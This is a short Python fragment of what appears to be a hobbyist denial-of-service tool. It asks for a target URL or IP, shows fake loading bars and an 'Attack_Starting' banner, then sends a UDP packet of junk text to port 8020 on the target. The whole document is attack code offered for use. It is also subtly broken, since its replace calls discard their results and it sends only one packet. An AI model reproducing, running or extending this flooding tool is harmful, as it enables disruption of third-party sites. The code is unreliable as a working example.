target = input(f"{green}Enter Target URL or IP : ")
target.replace("http://", "")
target.replace("https://","")
target.replace("www.","")
ip = socket.gethostbyname(target)
port = 8020
joker = "DDOSjsjsjjdjdjdjdjjjjjjjjjiiiiiiiopppkkkkjjjjjhhhbbbbgbvvvvvvvvvvvvhhyggggh"
os.system("clear")
os.system("toilet Loading")
print("Loading{~~~ }5%")
time.sleep(3)
print("Loading{~~~~~~ }26%")
time.sleep(4)
print("Loading{~~~~~~~~~ }68%")
time.sleep(5)
print("Loading{~~~~~~~~~~~~ }87%")
time.sleep(6)
print("Loading{~~~~~~~~~~~~~~~~ }•→START←•")
time.sleep(2)
print("Loading{~ }100%")
os.system("clear")
os.system("figlet Attack_Starting")

sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
sock.sendto(bytes(joker,"UTF-8"), (ip,port))
print(port,"IP site address >>",ip)
